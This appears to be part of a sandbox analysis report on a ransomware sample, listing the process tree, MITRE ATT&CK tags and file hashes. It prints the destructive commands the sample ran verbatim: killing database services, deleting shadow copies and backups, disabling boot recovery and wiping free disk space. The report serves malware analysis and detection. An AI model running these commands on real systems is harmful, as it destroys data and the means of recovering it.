wrote to memory of 2760 2776 cmd.exe 45 PID 2776 wrote to memory of 2760 2776 cmd.exe 45 PID 2776 wrote to memory of 2760 2776 cmd.exe 45 PID 2760 wrote to memory of 2924 2760 cmd.exe 46 PID 2760 wrote to memory of 2924 2760 cmd.exe 46 PID 2760 wrote to memory of 2924 2760 cmd.exe 46 PID 2068 wrote to memory of 2788 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 47 PID 2068 wrote to memory of 2788 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 47 PID 2068 wrote to memory of 2788 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 47 PID 2068 wrote to memory of 2788 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 47 PID 2788 wrote to memory of 3040 2788 cmd.exe 49 PID 2788 wrote to memory of 3040 2788 cmd.exe 49 PID 2788 wrote to memory of 3040 2788 cmd.exe 49 PID 2788 wrote to memory of 3040 2788 cmd.exe 49 PID 3040 wrote to memory of 3032 3040 cmd.exe 50 PID 3040 wrote to memory of 3032 3040 cmd.exe 50 PID 3040 wrote to memory of 3032 3040 cmd.exe 50 PID 2068 wrote to memory of 2792 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 51 PID 2068 wrote to memory of 2792 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 51 PID 2068 wrote to memory of 2792 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 51 PID 2068 wrote to memory of 2792 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 51 PID 2792 wrote to memory of 1104 2792 cmd.exe 53 PID 2792 wrote to memory of 1104 2792 cmd.exe 53 PID 2792 wrote to memory of 1104 2792 cmd.exe 53 PID 2792 wrote to memory of 1104 2792 cmd.exe 53 PID 1104 wrote to memory of 2620 1104 cmd.exe 54 PID 1104 wrote to memory of 2620 1104 cmd.exe 54 PID 1104 wrote to memory of 2620 1104 cmd.exe 54 PID 2068 wrote to memory of 2696 2068 ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe 55 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe"C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵PID:3060
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\taskkill.exetaskkill -f -im sql writer.exe5⤵
- Kills process with taskkill
PID:2824
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlserv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- System Location Discovery: System Language Discovery
PID:2696 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵PID:2384
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- System Location Discovery: System Language Discovery
PID:1948 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵PID:2892
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- System Location Discovery: System Language Discovery
PID:1772 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵PID:1272
-
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵
- System Location Discovery: System Language Discovery
PID:1752 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵PID:1192
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵
- System Location Discovery: System Language Discovery
PID:288 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵PID:1964
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵
- System Location Discovery: System Language Discovery
PID:2512 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵PID:1668
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵
- System Location Discovery: System Language Discovery
PID:1252 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵PID:1904
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵
- System Location Discovery: System Language Discovery
PID:1624 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵PID:2804
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe3⤵
- System Location Discovery: System Language Discovery
PID:1312 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe4⤵PID:1548
-
C:\Windows\system32\taskkill.exetaskkill -f -impostgres.exe5⤵
- Kills process with taskkill
PID:1800
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵PID:872
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵PID:1860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵PID:1644
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵PID:1980
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵PID:2488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵PID:848
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
- System Location Discovery: System Language Discovery
PID:1016 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵PID:1472
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵PID:2164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵PID:2456
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
- System Location Discovery: System Language Discovery
PID:2484 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵PID:1712
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵PID:2156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵PID:2404
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
- System Location Discovery: System Language Discovery
PID:2280 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵PID:2424
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵PID:1700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵PID:1660
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
- System Location Discovery: System Language Discovery
PID:1000 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵PID:2116
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵PID:804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵PID:680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS3⤵
- System Location Discovery: System Language Discovery
PID:2124 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS4⤵PID:1804
-
C:\Windows\system32\net.exenet stop REportServer$ISARS5⤵PID:888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop REportServer$ISARS6⤵PID:1260
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
- System Location Discovery: System Language Discovery
PID:2036 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵PID:2364
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵PID:2444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵PID:1520
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵PID:2644
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:2264
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet3⤵
- System Location Discovery: System Language Discovery
PID:1656 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet4⤵PID:2744
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersion:0 -quiet5⤵
- Deletes system backups
PID:1884
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
- System Location Discovery: System Language Discovery
PID:1504 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵PID:3056
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
- Drops file in Windows directory
PID:2760
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest3⤵
- System Location Discovery: System Language Discovery
PID:1996 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest4⤵PID:2916
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTABACKUP -deleteOldest5⤵PID:1128
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵
- System Location Discovery: System Language Discovery
PID:3060 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵PID:2840
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No3⤵
- System Location Discovery: System Language Discovery
PID:2708 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No4⤵PID:2496
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoverynabled No5⤵
- Modifies boot configuration data using bcdedit
PID:1912
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵PID:2836
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:1908
-
-
-
-
C:\Windows\system32\cipher.execipher /w:\\?\A:3⤵
- Enumerates connected drives
PID:3008
-
-
C:\Windows\system32\cipher.execipher /w:\\?\C:3⤵PID:1124
-
-
C:\Windows\system32\cipher.execipher /w:\\?\F:3⤵
- Enumerates connected drives
PID:2628
-
-
-
C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe\\?\C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -network2⤵
- Adds Run key to start application
PID:2824
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:792
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\How_to_back_files.html2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1932 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1932 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:760
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Direct Volume Access
1Indicator Removal
4File Deletion
4Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD507264aa79c9c80b7e6cd8a14b12aa40d
SHA161dfd4f27cdc2d182e77a7676ec2395dc8730542
SHA256c9fac645f65fd4583f29e2ac1831ad45472a139e4d19d6c3ea2d97d3237155a9
SHA51249a6e7c30c230aaa3313df18ee0e7b5e6a129728a8697cf846e942878d2655bfe4ac198fd6cb8b7400ec461bcfb239fb93a1430a2874eaba919e8678ac4a581a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD57d34816fcaf8524fd8ddcb71d216dacd
SHA1e56e56d3a43f2eb3ed49ad94cf3c9bd4aa63343b
SHA256891c48d6f1060a81449e4745a8838dc00d1d86d0188631b8b5a06374878caf81
SHA51229d3b0aae5f73406f69e53319cf506d345d12a5bcfb0c1b4f1cbbd9e93d4828a87668aa9e8a05f76992d92256820a1229c73d58a85e1533a3d55768a15391310
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f5f05f9cc522a7095131826eb5a99a0a
SHA191244129046920a19356c277050ec74dedd81176
SHA256f6e9ec49c8d415eb190c6c9cf17a44910c54b9f95013a2be47d6ed2dbf4dc8d1
SHA512cfb4e6c891f83f578c4823874e6ab233fb9403a7677c8f110fc9a281f5a86fcb2d7a9c465f623dd073505708c3430d9b93de5cd102f3b2d0bc03d644e7a7d170
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD574c482cb984b5ca0d96cb6af62d4cfb5
SHA18e58afefd83efbba71bbbe9707848248492a06d8
SHA256618a21120104e3ecb566949c055d7605b676df59abde84e2f3bc3271a00efbd3
SHA5127b4fb08e31e49d26a90d00461fe7f1cb66945efb319e7e9dd1483de02f11e224d8b6ca54cfef29d225b2ce5f4adbc6812782006f47650ddc3887c1ea61ddbcc3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f685fb81bfab313c9875ca5a24ea4ec7
SHA17254edd093c80416f1daef8ed5ebd84e2757bd66
SHA256ab44a4d0d6fbdca75027787bd92422bf1d99c82db362765b2adb1a47dee7007d
SHA5122001bfcc98f56a3f6d91015ca9d40112d4f42e9d2c478c4183312f65415dd3a26c6243f359c272e3b54e0b4aa7532dd8f8a404aaef0225e25723a6699473fe8e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD51f611f72d020461db6ef355e0f5621a0
SHA1a81346e0e0f11510c96b7d0206e0290db9a2d1ae
SHA256d401a60d5005abb108d37c7d6886b458997e02d1533ab95fbb6285c0bf3fff0f
SHA5125c1efb85fc24ba492be7e8478c6a45d3a76eec3be096341c8742cf112818815efc9a67481095c11fb4c6d2e09be704a28cebb4d804f158031d12c940cefd3111
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e0a1b4c7cc003115661f569660fcedf2
SHA1fd6f76c47bb8c4d35cb9c7d02433963652ae6a8f
SHA2562da50fb0e6bcbc7a24400eb9a563d6e9a44f962d13820da942237c7a5d5cf49e
SHA512b79bf45481b92abbb75b4851c1fa52126d07c2b3971f86086958d5b7d1e334c72e721354cd6b70fe6189d16e05fa88be45210b67eb0fdb7a7e16c153d415dd71
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b